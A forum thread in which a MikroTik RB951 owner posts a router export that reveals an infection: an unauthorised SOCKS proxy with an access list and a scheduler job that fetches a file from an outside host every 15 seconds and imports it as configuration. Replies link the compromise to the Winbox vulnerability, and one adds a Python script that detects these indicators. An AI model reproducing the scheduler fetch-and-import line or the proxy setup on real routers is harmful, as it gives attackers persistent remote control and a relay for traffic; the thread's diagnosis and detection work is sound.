"Strange" traffic from router

I’m setting up a RB951-2n as a router with Ether1 as the WAN port and each of the other Ethernet ports as separate LANS (i.e. Ether2 is 192.168.2.0/24, Ether3 is 192.168.3.0/24 and so on). Separate DHCP servers are defined for each ethernet port. Have configured NAT and set up standard firewall rules.
It seems to work ok (have only tested the Ethernet2 net so far).
There is, however, a lot of traffic on the router’s WAN-port (Ether1) - even if nothing is connected to any of the other ports.
Any ideas what this is, and what is causing it (and how to stop it)?

The WAN ip in the log is greyed out in order to not disclose the real address.

-Olaf-
RB951-log-1.jpg

srcnat occurs in the postrouting chain, therefore it is applied to both the forward and output chains (unless your rule specifies otherwise).
From this log, it is impossible to make sure where the data comes from. By looking at the stats of each interface, torch results or packet sniffer results, you should be able to track down what is causing this traffic.
If you want others to tell you possible causes, you will need to share your config (/export hide-sensitive). It is recommended to find+replace all personal data (public IP, passwords etc.).
Without knowing your config, it is just completely wild guessing.

Thanks for the info.
Did an export from the router and have included it below.
Seems like some strange stuff in there - things I've never entered, like the /ip socks access
Also, at the end of the config - the /system scheduler.
There was also a file on the router - 7wmp0b4swouv - that I have no knowledge of.
May seem like an infection?
Router is now disconnected from the internet....
Before starting the config, the router was set to factory default.

-Olaf-

nov/01/2018 10:13:33 by RouterOS 6.34.2

software id = KMXG-D411

/ip pool
add name=pool2 ranges=192.168.2.20-192.168.2.99
add name=pool3 ranges=192.168.3.30-192.169.3.100
/ip dhcp-server
add address-pool=pool2 disabled=no interface=ether2 lease-time=1d12m name=
server2
add address-pool=pool3 disabled=no interface=ether3 name=server3
/queue simple
add max-limit=3M/3M name=speed2 target=ether2
/ip address
add address=xxx.xxx.xxx.xxx/25 interface=ether1 network=xxx.xxx.xxx.128
add address=192.168.88.1/24 interface=ether5 network=192.168.88.0
add address=192.168.4.1/24 interface=ether4 network=192.168.4.0
add address=192.168.3.1/24 interface=ether3 network=192.168.3.0
add address=192.168.2.1/24 interface=ether2 network=192.168.2.0
/ip dhcp-server network
add address=192.168.2.0/24 dns-server=192.168.2.1,yyy.yyy.yyy.yyy gateway=
192.168.2.1 netmask=24
add address=192.168.3.0/32 dns-server=yyy.yyy.yyy.yyy gateway=192.168.3.1
netmask=24
/ip dns
set servers=8.8.8.8,1.1.1.1
/ip firewall filter
add chain=input protocol=icmp
add chain=input dst-port=8291 protocol=tcp
add chain=input connection-state=established,related
add action=drop chain=input in-interface=ether1
add chain=forward connection-state=established,related
add action=drop chain=forward connection-state=invalid
/ip firewall nat
add action=masquerade chain=srcnat log=yes out-interface=ether1
/ip route
add distance=1 gateway=xxx.xxx.xxx.129
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh disabled=yes port=19854
set api disabled=yes
set api-ssl disabled=yes
/ip socks
set enabled=yes port=3585
/ip socks access
add src-address=5.188.0.0/15
add src-address=192.243.0.0/16
add src-address=5.9.0.0/16
add src-address=5.104.0.0/16
add action=deny src-address=0.0.0.0/0
add src-address=5.188.0.0/15
add src-address=192.243.0.0/16
add src-address=5.9.0.0/16
add src-address=5.104.0.0/16
add action=deny src-address=0.0.0.0/0
add src-address=5.188.0.0/15
add src-address=192.243.0.0/16
add src-address=5.9.0.0/16
add src-address=5.104.0.0/16
add action=deny src-address=0.0.0.0/0
/system clock
set time-zone-name=Europe/Oslo
/system leds
set 0 interface=wlan1
/system ntp client
set enabled=yes primary-ntp=aaa.aaa.aaa.aaa
/system routerboard settings
set cpu-frequency=400MHz
/system scheduler
add interval=15s name=U6 on-event="/tool fetch url=http://fanmusic.xyz/poll/f8\
6e8ac6-405b-43c9-9916-d29afaeec294 mode=http dst-path=7wmp0b4swouv\r
\n/import 7wmp0b4swouv" policy=
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=
startup

Please read this post from MikroTik, it contains all info to fix the issue:

https://blog.mikrotik.com/security/winbox-vulnerability.html

It’s fairly obvious that things you didn’t enter have been entered by someone else, is it not?
6.34.2 is ancient and insecure, which is why it happened. Did you search the forum or look in Announcements?
Upgrade to a modern version, clear out all the junk, and set up a proper firewall (or preferably restore to default configuration and go from there re-entering the required bits of your config.)
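An added check (my own code, not from this thread or from MikroTik) that scans a RouterOS export for the artefacts visible in Olaf's config: a Winbox (tcp/8291) input accept rule not bound to an interface, so it also matches ether1; the enabled SOCKS proxy and its access list; and a scheduler job that fetches a remote file and imports it. The sample export is constructed, with a placeholder URL and file name.

```python
# Constructed sample modelled on the export posted in the thread; the URL and
# dst-path are placeholders, not the real values from that router.
SAMPLE_EXPORT = r"""/ip firewall filter
add chain=input dst-port=8291 protocol=tcp
add action=drop chain=input in-interface=ether1
/ip socks
set enabled=yes port=3585
/ip socks access
add src-address=203.0.113.0/24
add action=deny src-address=0.0.0.0/0
/system scheduler
add interval=15s name=U6 on-event="/tool fetch url=http://example.invalid/poll/id\
 mode=http dst-path=dropfile\r\
\n/import dropfile" policy=reboot,read,write,policy start-time=startup
"""

def parse(export):
    """Return (section, command) pairs; joins backslash-continued export lines first."""
    pairs, section, buf = [], "", ""
    for raw in export.splitlines():
        if raw.endswith("\\"):            # continuation line: keep collecting
            buf += raw[:-1]
            continue
        line, buf = (buf + raw).strip(), ""
        if line.startswith("/"):          # a new section such as /ip socks
            section = line
        elif line and not line.startswith("#"):
            pairs.append((section, line))
    return pairs

def find_indicators(export):
    """Return human-readable findings for the artefacts seen in the thread."""
    hits, socks_access = [], 0
    for section, cmd in parse(export):
        accept = "action=" not in cmd or "action=accept" in cmd   # default action is accept
        if (section == "/ip firewall filter" and "chain=input" in cmd and accept
                and "dst-port=8291" in cmd and "in-interface=" not in cmd):
            hits.append("winbox (tcp/8291) accepted on every interface, WAN included")
        elif section == "/ip socks" and "enabled=yes" in cmd:
            hits.append("SOCKS proxy enabled")
        elif section == "/ip socks access":
            socks_access += 1
        elif section == "/system scheduler" and "/tool fetch" in cmd and "/import" in cmd:
            name = cmd.split("name=", 1)[1].split()[0]
            hits.append(f"scheduler job {name} fetches a remote file and imports it")
    if socks_access:
        hits.append(f"{socks_access} SOCKS access rules present")
    return hits
```

Run it against the output of /export on a router (after hide-sensitive) and review every finding by hand; the rule checks are deliberately simple string matches, so a rule such as in-interface=!ether1 still gets reported for review.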

Thanks!

Good that this was only a test setup (and I didn't check the OS version).
All other Mikrotiks in my system are on OS 6.42 or higher.
Changing all passwords now…
-O-